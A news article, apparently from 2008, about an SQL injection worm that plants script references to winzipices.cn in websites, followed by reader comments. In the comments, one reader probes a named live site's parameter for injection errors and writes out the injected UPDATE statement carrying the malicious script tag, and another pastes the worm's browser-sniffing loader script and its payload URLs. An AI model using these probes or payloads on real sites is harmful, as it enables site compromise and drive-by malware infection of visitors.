Web attack worm on a rampage

The Internet Storm Center, which tracks online threats, warned Wednesday that a worm is infecting vulnerable Web sites with a database attack. Though relatively small by Web attack standards with about 4,000 reported infected sites, the assault adds invisible code to a site that can force visitors to download malware onto their PC. Bad PR, to say the least.

IMPORTANT: DO NOT visit the domain named in the following test, or any sites that show up on a Web search as having this domain listed in their pages' code (including cached pages). Doing so could infect your PC with malware.

To see if your site has been hit, run the following Google search: "site:your company domain (ex. pcworld.com) winzipices.cn" -- or search for that domain within your Web site's HTML code. If you find anything, let your IT know immediately. When I ran a search just now I saw sites for everything from insurance companies to cemeteries to universities that all appear to have been infected.

The worm uses a SQL injection attack, according to the ISC, but it doesn't yet know just what vulnerability is targeted. The attack highlights the importance of keeping your site secure, something I wrote about last month. It's likewise critical to keep your own PC software up-to-date, as the ISC says visitors to infected sites can be hit via a known flaw in old Real Player software.

News Source: Computer World

Report a problem with article
Previous Story

Microsoft confirms no Copyright Cop on Zune

Next Story

New Xbox 360 code-named "Jasper" consoles are on the way!

34 Comments

Commenting is disabled on this article.

Makes me think how valuable Vista's UAC actually is! If I came across a vulnerability like this, AFAIK a UAC dialog should pop up asking for admin priviledges, and since I never get those UAC dialogs while just browsing the net, I'd be very suspicious and I'm sure most people would, too.

See, UAC ain't that bad :P real world example of why you should leave it on and just quit moaning about it once and for all!

It's quite obvious how this attack works, though I'm not sure what makes it a worm (maybe the payload scans more sites?).

The attack virus checks for simple SQL injection holes in ASP pages (by spidering the site and putting bad data for the URL/CGI parameters that would output an OLE/ODBC error on the webpage). Once an SQL injection hole is found, it's a trivial matter to get the database structure and insert the payload script reference into various strings.

For example, the first hit for "site:* winzipices.cn" on google:

http://www.wiredseniors.com/seniorssearch/...d_And_Breakfast

Let's test the cn parameter in the URL:

http://www.wiredseniors.com/seniorssearch/...?cn=152101'

It returns:

Microsoft OLE DB Provider for SQL Server error '80040e21'

The requested properties cannot be supported.

E:\DOMAINS\WIREDSENIORS.COM\WWWROOT\SENIORSSEARCH\DIRECTORY\../../cgi-bin/seniorssearch/dir/page_include_new.asp, line 133

With a bit more searching, it shouldn't be hard to find a proper SQL injection hole. Then you just need to get the database structure to figure out which tables to "UPDATE blah SET blah = blah + "<script src="http://winzipices.cn/2.js"></script>"".

ASP SQL injection is so popular that I'm surprised an automated attack hasn't happened until now.

infected sites can be hit via a known flaw in old Real Player software.

Anyone still use Real Player?? :P (Besides grandma?)

One of my company's clients got hit with this. I was feeling kind of crummy that I couldn't figure out the attack vector, but it's nice for my ego to see that the security experts haven't figured it out either.

window.onerror=function(){return true};
if(Isie6())
{
document.writeln("");
}

if(Isie7())
{
document.writeln("");

}

if(isFirefox=navigator.userAgent.indexOf("Firefox")>0){
document.writeln("");

}
function Isie6()
{
var agent = navigator.userAgent;
str = "MSIE";
if ((i = agent.indexOf(str)) >= 0) {
this.isIE = true;
if(parseFloat(agent.substr(i + str.length))==6)
{
return true;
}
else
{
return false;
}
}
}
function Isie7()
{
var agent = navigator.userAgent;
str = "MSIE";
if ((i = agent.indexOf(str)) >= 0) {
this.isIE = true;
if(parseFloat(agent.substr(i + str.length))==7)
{
return true;
}
else
{
return false;
}
}
}

It is the virus, firefox is safe.

The virus will trigger with : h**p://winzipices.cn/6.gif (iexplorer 6) and h**p://winzipices.cn/7.gif (iexplorer 7)

So what exactly does this do to you if you visit one of these sites?
I find it hard to believe that it manages to affect all browsers on all OS's, so a bit more information would be nice.
Unless it just pops up with a .exe to download or something stupid like that?

????

There are a script that open a iframe, this iframe will open a file with extension .as , this as finally open the next picture:


http://www.bsu.edu/web/nmmakridakis/images/lolret6.jpg
(i dont find any virus from this file with my antivirus update, may be the virus is in the .as

well, I am running Vista x64, no antivirus, defender disabled. I tried a few sites, nothing happened :(. I looked at the source of the script it loads, manually went to the page it tries to load in an iframe, and still nothing .... i am rather disappointed :P

(some_guy said @ #5.1)
damn you are right... a lot of schools

I guess even schools don't have good admins. Didn't everyone talk up this worm weeks ago? It's a dev problem and not something in the software etc etc.

(u2_storm said @ #4)
I did a search and couldn't find anything..... I tired a load of sites I use... nothing... anyone elsE?

Search for the attack site domain. Google returns 9250 sites with that code in it so far.

(GreyWolfSC said @ #4.1)
Search for the attack site domain. Google returns 9250 sites with that code in it so far.

A good percentage of the hits are from sites reporting the attack not infected sites.

(lardboy said @ #3)
Another good reason to be using firefox with noscript installed

You big girl, I'm hard & wise enough to use IE7 with everything on, but then I have a decent Anti-Virus and not McAfee or Norton.